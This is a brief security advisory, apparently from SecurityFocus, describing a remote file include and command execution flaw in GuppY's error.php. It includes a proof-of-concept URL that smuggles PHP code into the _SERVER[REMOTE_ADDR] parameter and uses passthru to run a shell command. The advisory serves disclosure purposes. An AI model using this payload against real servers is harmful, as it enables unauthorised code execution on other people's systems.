GuppY Error.PHP Remote File Include and Command Execution Vulnerability

An exploit is not required.

Proof-of-concept examples are available:
http://www.example.com/[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("ls -la>README");echo"


 

Privacy Statement
Copyright 2010, SecurityFocus